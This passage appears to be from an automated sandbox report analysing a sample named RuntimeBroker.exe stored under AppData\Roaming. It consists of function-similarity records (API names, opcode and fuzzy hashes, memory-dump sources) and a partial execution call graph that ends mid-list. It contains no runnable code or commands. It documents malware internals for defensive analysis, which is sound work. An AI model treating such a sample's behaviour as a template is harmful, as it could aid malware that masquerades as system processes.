                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                • Opcode ID: 03a08327e3a10131aa5bb8fa3ef37a2eed6d70488736d84a243644e572cc7fb3
                                                                                                                                                                                • Instruction ID: bfc7b82fc04d67e8bb8ad6151a97703bd95c905b85d1948e50f44f589680d349
                                                                                                                                                                                • Opcode Fuzzy Hash: 03a08327e3a10131aa5bb8fa3ef37a2eed6d70488736d84a243644e572cc7fb3
                                                                                                                                                                                • Instruction Fuzzy Hash: 58411622F1868242FB76AB29984137DE650EB84BA4F984235EE5D06AF5DF3CD441CF10
                                                                                                                                                                                APIs
                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06835E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C6E
                                                                                                                                                                                  • Part of subcall function 00007FF72B069C58: GetLastError.KERNEL32(?,?,?,00007FF72B072032,?,?,?,00007FF72B07206F,?,?,00000000,00007FF72B072535,?,?,?,00007FF72B072467), ref: 00007FF72B069C78
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72B05BEC5), ref: 00007FF72B06837C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                • API String ID: 3976345311-1543962311
                                                                                                                                                                                • Opcode ID: 53ad205ea1c6cb2f7bb7661613e3da0ecc1c0905bf47b453e04b3a6da8a19941
                                                                                                                                                                                • Instruction ID: 2539bdd8084f1cd2cc6cc6601e85a136772b5529dc3f92943a57d9aae840575e
                                                                                                                                                                                • Opcode Fuzzy Hash: 53ad205ea1c6cb2f7bb7661613e3da0ecc1c0905bf47b453e04b3a6da8a19941
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F419631B08B5685EB36EF299C400BDA394FF497D0B95403AEA4D47B65DE3CE4818B20
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: .$:
                                                                                                                                                                                • API String ID: 2020911589-4202072812
                                                                                                                                                                                • Opcode ID: a48a17356a0428a0afa3d913acfd81f18579104ff5d62f2c598705e7d941a643
                                                                                                                                                                                • Instruction ID: 3de1c373dcebb7a7a1ded97751d954f820a9a13e697d439caecd80a629144a43
                                                                                                                                                                                • Opcode Fuzzy Hash: a48a17356a0428a0afa3d913acfd81f18579104ff5d62f2c598705e7d941a643
                                                                                                                                                                                • Instruction Fuzzy Hash: 20414122F0875298FB22EBB99C511FC66B4EF18758F94003DDE4D67A69DF3894468B30
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                • String ID: U
                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                • Instruction ID: 873119857340cf7b81fbacf03a0b6f62e81bee505d084e97a1210ff757f0c809
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C41B462B19A8581EB31AF29E8443B9B760FB88794F944035EE4D877A8DF7CD441CB50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                • Opcode ID: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
                                                                                                                                                                                • Instruction ID: 9fadecb3cbe0a180659dfe13074b00e3369982ddbd98cc857283155f580d1264
                                                                                                                                                                                • Opcode Fuzzy Hash: 4406e5919126d02ea3a76b6133a572177de49089f209fdac8df3cc0ad0528a12
                                                                                                                                                                                • Instruction Fuzzy Hash: 0621C322B0878181EB71AB19D85427EF3A1FB88B48FD54039D68D436A5DF7CE545CF60
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                • Instruction ID: 89fd6c935d8d503beee6f9cc5e23c572ea05b56471c3aedf89196a466fab4410
                                                                                                                                                                                • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                • Instruction Fuzzy Hash: 66112E36619B4582EB629B19F840269B7E4FB88B84F584231DBCD07B68DF3CD5518B10
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                • String ID: :
                                                                                                                                                                                • API String ID: 2595371189-336475711
                                                                                                                                                                                • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                • Instruction ID: 6141efd89a2519dc5b38a0b070ed4cf00c9d334f55a5d81c2ab38af2b1b0785d
                                                                                                                                                                                • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                • Instruction Fuzzy Hash: 80018461B1C24285F732BF689C6127EA390FF4C748FC41039D55D826A5DE7CE504CE24
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ;O_I$<O_I$=O_I$>O_I
                                                                                                                                                                                • API String ID: 0-1966683728
                                                                                                                                                                                • Opcode ID: 055e95be56c063c2dc3423310bfa78102f8bc9aef103898d036b3a454a73e798
                                                                                                                                                                                • Instruction ID: c149b1155a50d163dbd434b02dae0bfed309ab1abfc79431b575e46d11563b33
                                                                                                                                                                                • Opcode Fuzzy Hash: 055e95be56c063c2dc3423310bfa78102f8bc9aef103898d036b3a454a73e798
                                                                                                                                                                                • Instruction Fuzzy Hash: ABF10A93B1FEC50FFB6147AC18691245EA1FF95A5075905FBE0E88B1FFB824AE058381
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ;O_I$<O_I$=O_I
                                                                                                                                                                                • API String ID: 0-2959341866
                                                                                                                                                                                • Opcode ID: fdaf68afa6281beba8e2d014a5600439cd57b09121f16d638109efe665776648
                                                                                                                                                                                • Instruction ID: 7aa00354e9454d67c43065fb68165b07ce7c07f7eb7fc08f4ccdae49ccc15fcb
                                                                                                                                                                                • Opcode Fuzzy Hash: fdaf68afa6281beba8e2d014a5600439cd57b09121f16d638109efe665776648
                                                                                                                                                                                • Instruction Fuzzy Hash: 10024C53A1FEC50FE77157A818751647FA1EF4AA5074906FBE0E8CB1FBE824AE068341
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bbcc17edf633abd0fb6c368175323d8ab172a36b664c90e5163a00206316604c
                                                                                                                                                                                • Instruction ID: 605ad6211fc83009703c026bb1d998c77eeaf6411895b1df6a1ec5c188277c24
                                                                                                                                                                                • Opcode Fuzzy Hash: bbcc17edf633abd0fb6c368175323d8ab172a36b664c90e5163a00206316604c
                                                                                                                                                                                • Instruction Fuzzy Hash: 8CC1B730B19E4E8FEB99EF58C465AA977E1FF58300F140569E45AC72D6CE34E842C741
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 32fe51e102beaac8e5f6182dbd6ea8094de38d6c016a52a272eaf7aaae40e9d1
                                                                                                                                                                                • Instruction ID: e81a68915cc50355fb4eeed49bf18cbca61d41cd13293c272e00d47a740c66c0
                                                                                                                                                                                • Opcode Fuzzy Hash: 32fe51e102beaac8e5f6182dbd6ea8094de38d6c016a52a272eaf7aaae40e9d1
                                                                                                                                                                                • Instruction Fuzzy Hash: 2181DC21A1DACE4FE746DB2C84719A9BFB1EF5B380B4545E6D188CB2DBC9246C86C311
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7ba58afd3f7f74c21cc57ef638dd6a309481f979ba971b949a09c988d599f405
                                                                                                                                                                                • Instruction ID: 25251d543e8db8a49acf9e1c31753571ebcacc7a693bb305b854bbda111fae92
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ba58afd3f7f74c21cc57ef638dd6a309481f979ba971b949a09c988d599f405
                                                                                                                                                                                • Instruction Fuzzy Hash: 9D71CA70A09A8F8FDB89DF58C451AAA77F1FF5D300F1046A9D459CB2D5CA34E942CB81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3006d5f944b166d4a7ac72027e54f0f26ca5feca3bfe4aa0dde515016b618f35
                                                                                                                                                                                • Instruction ID: 7001d30386b206181524b7fb50d3cbd114275072ab9f2f415251a08dce6b1dc7
                                                                                                                                                                                • Opcode Fuzzy Hash: 3006d5f944b166d4a7ac72027e54f0f26ca5feca3bfe4aa0dde515016b618f35
                                                                                                                                                                                • Instruction Fuzzy Hash: F1514431B19E4E8FDBA8EF58C464AAA77E1FF58310B150579E41AC7295CE34E841CB41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1d70849a95049daae787b25c5e9e6ed0a0ad35083211f7815983a21c24a008bd
                                                                                                                                                                                • Instruction ID: 05f790879af7c5c630edc06adfdb5a99c41103421ec4dcccbdab5e074ac3c208
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d70849a95049daae787b25c5e9e6ed0a0ad35083211f7815983a21c24a008bd
                                                                                                                                                                                • Instruction Fuzzy Hash: 5351B270908B1C8FDB58EF98D8456EDBBF1FB99310F00826BE449D7256DA34A945CBC2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6e5ea616e3f6beeff4e4e1c00b07f89fe3d2d918e1f1a01d965f0d96efafd4fd
                                                                                                                                                                                • Instruction ID: ac11d50a99c9194e79c4e8da3905cc6ef894485b5d6efd253323a58423f5e03e
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e5ea616e3f6beeff4e4e1c00b07f89fe3d2d918e1f1a01d965f0d96efafd4fd
                                                                                                                                                                                • Instruction Fuzzy Hash: F0119F22F2AD5E4BF7B497A848316F972D2EF49750F460276D43CC31E3DD287A1A0682
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 76dcfaf9b748d265e78a8123abb61f99c7d0c098c4482cc4a3da5ff13684668b
                                                                                                                                                                                • Instruction ID: 795ca5fe5dc203bedf48255dce15c88c1c1c36f0abe6b02ce1c0aed832595993
                                                                                                                                                                                • Opcode Fuzzy Hash: 76dcfaf9b748d265e78a8123abb61f99c7d0c098c4482cc4a3da5ff13684668b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0CF0EC1161FB950FE36993AD48612657EE1DB4D500F0581FFD099D76E3C8995C424351
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 62d473f50ee0975a8bbd48a29f561d7c5e0e600ce5d9b3cf7383629e381653c6
                                                                                                                                                                                • Instruction ID: c8e0100cb4387a64ab2fafb8460a6a878af0376b5d38179e8e0f46e9bea33f95
                                                                                                                                                                                • Opcode Fuzzy Hash: 62d473f50ee0975a8bbd48a29f561d7c5e0e600ce5d9b3cf7383629e381653c6
                                                                                                                                                                                • Instruction Fuzzy Hash: 82E0C221F5581E4EEB48B7B47C369FDF245DFC9200BD10872E02DC30CBDD2925120282
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f08781f5cffcd185b7b65a8c72d7d745384946f22b6caec8bbd5be90f1a2f1ed
                                                                                                                                                                                • Instruction ID: 24b054264d7f5bc573b303a99f227cab863242933d39adcf5d3e4660be96c54e
                                                                                                                                                                                • Opcode Fuzzy Hash: f08781f5cffcd185b7b65a8c72d7d745384946f22b6caec8bbd5be90f1a2f1ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 71E04F3145CB088BC344EF18D44049AB7E0FF94320F800B2EF05AC71B5DB7596818A82
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2085704023.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ffd9b880000_RuntimeBroker2.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 39566fef43db579fe1d803b1052bc9ab0328c20e281cb49caf0038af5b9ca710
                                                                                                                                                                                • Instruction ID: d4fabc39b5df375da8d3fcc4a7dcfd09ba5dfb887dcba3480868141aad0abfdc
                                                                                                                                                                                • Opcode Fuzzy Hash: 39566fef43db579fe1d803b1052bc9ab0328c20e281cb49caf0038af5b9ca710
                                                                                                                                                                                • Instruction Fuzzy Hash: 80C0123252DA4D57D351AB10E851CEA7350BF90610F801B39F05A92099DD68A6458582

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.3%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:655
                                                                                                                                                                                Total number of Limit Nodes:8
                                                                                                                                                                                execution_graph 22309 7ffe0c0b2a59 abort 22310 7ffe0c0b604f RtlPcToFileHeader RtlPcToFileHeader RaiseException 22311 7ff72b052030 21 API calls 22371 7ff72b057b30 Sleep 22312 7ff72b06b830 47 API calls _isindst 22372 7ff72b076f30 65 API calls 22375 7ff72b064720 76 API calls Concurrency::details::SchedulerProxy::DeleteThis 22313 7ff72b056420 10 API calls 22376 7ff72b05cd48 45 API calls 22316 7ffe0c0b2470 14 API calls 2 library calls 22379 7ffe0c0bfaf8 21 API calls 2 library calls 22239 7ff72b064938 22240 7ff72b06496f 22239->22240 22241 7ff72b064952 22239->22241 22240->22241 22243 7ff72b064982 CreateFileW 22240->22243 22264 7ff72b0643d4 11 API calls _get_daylight 22241->22264 22245 7ff72b0649ec 22243->22245 22246 7ff72b0649b6 22243->22246 22244 7ff72b064957 22265 7ff72b0643f4 11 API calls _get_daylight 22244->22265 22268 7ff72b064f14 46 API calls 3 library calls 22245->22268 22267 7ff72b064a8c 59 API calls 3 library calls 22246->22267 22250 7ff72b06495f 22266 7ff72b069bf0 37 API calls _invalid_parameter_noinfo 22250->22266 22251 7ff72b0649c4 22256 7ff72b0649cb CloseHandle 22251->22256 22257 7ff72b0649e1 CloseHandle 22251->22257 22252 7ff72b0649f1 22253 7ff72b0649f5 22252->22253 22254 7ff72b064a20 22252->22254 22269 7ff72b064368 11 API calls 2 library calls 22253->22269 22270 7ff72b064cd4 51 API calls 22254->22270 22260 7ff72b06496a 22256->22260 22257->22260 22261 7ff72b064a2d 22271 7ff72b064e10 21 API calls _fread_nolock 22261->22271 22263 7ff72b0649ff 22263->22260 22264->22244 22265->22250 22266->22260 22267->22251 22268->22252 22269->22263 22270->22261 22271->22263 22319 7ffe0c0b6260 InterlockedFlushSList free 22321 7ff72b05c640 54 API calls 22382 7ff72b05bf40 38 API calls 2 library calls 22383 7ff72b056340 49 API calls _log10_special 22324 7ffe0c0b6490 9 API calls __vcrt_getptd_noinit 22325 7ffe0c0c0490 14 API calls _CatchTryBlock 22326 7ff72b05be70 57 API calls 2 library calls 22327 7ff72b06b870 12 API calls 22384 7ff72b070770 55 API calls 3 library calls 22385 7ff72b06e570 FreeLibrary 21427 7ff72b05bf5c 21448 7ff72b05c12c 21427->21448 21430 7ff72b05c0a8 21567 7ff72b05c44c 7 API calls 2 library calls 21430->21567 21431 7ff72b05bf78 __scrt_acquire_startup_lock 21433 7ff72b05c0b2 21431->21433 21440 7ff72b05bf96 __scrt_release_startup_lock 21431->21440 21568 7ff72b05c44c 7 API calls 2 library calls 21433->21568 21435 7ff72b05bfbb 21436 7ff72b05c0bd __GetCurrentState 21437 7ff72b05c041 21454 7ff72b05c594 21437->21454 21439 7ff72b05c046 21457 7ff72b051000 21439->21457 21440->21435 21440->21437 21564 7ff72b068e44 45 API calls 21440->21564 21445 7ff72b05c069 21445->21436 21566 7ff72b05c2b0 7 API calls 21445->21566 21447 7ff72b05c080 21447->21435 21449 7ff72b05c134 21448->21449 21450 7ff72b05c140 __scrt_dllmain_crt_thread_attach 21449->21450 21451 7ff72b05c14d 21450->21451 21453 7ff72b05bf70 21450->21453 21451->21453 21569 7ff72b05cba8 7 API calls 2 library calls 21451->21569 21453->21430 21453->21431 21570 7ff72b0797e0 21454->21570 21458 7ff72b051009 21457->21458 21572 7ff72b064794 21458->21572 21460 7ff72b05352b 21579 7ff72b0533e0 21460->21579 21467 7ff72b05356c 21672 7ff72b051bf0 21467->21672 21468 7ff72b053736 21687 7ff72b053f70 21468->21687 21472 7ff72b053785 21710 7ff72b0525f0 53 API calls _log10_special 21472->21710 21476 7ff72b05365f __std_exception_copy 21482 7ff72b053844 21476->21482 21486 7ff72b057e10 14 API calls 21476->21486 21477 7ff72b053538 21678 7ff72b05b870 21477->21678 21478 7ff72b053778 21479 7ff72b05377d 21478->21479 21480 7ff72b05379f 21478->21480 21706 7ff72b05f36c 21479->21706 21481 7ff72b051bf0 49 API calls 21480->21481 21484 7ff72b0537be 21481->21484 21714 7ff72b053e90 49 API calls 21482->21714 21494 7ff72b0518f0 115 API calls 21484->21494 21485 7ff72b053588 21641 7ff72b057e10 21485->21641 21488 7ff72b0536ae 21486->21488 21676 7ff72b057f80 40 API calls __std_exception_copy 21488->21676 21489 7ff72b053852 21491 7ff72b053865 21489->21491 21492 7ff72b053871 21489->21492 21715 7ff72b053fe0 21491->21715 21493 7ff72b051bf0 49 API calls 21492->21493 21511 7ff72b053805 __std_exception_copy 21493->21511 21497 7ff72b0537df 21494->21497 21495 7ff72b0536bd 21498 7ff72b05380f 21495->21498 21502 7ff72b0536cf 21495->21502 21497->21485 21501 7ff72b0537ef 21497->21501 21712 7ff72b058400 58 API calls _log10_special 21498->21712 21711 7ff72b0525f0 53 API calls _log10_special 21501->21711 21506 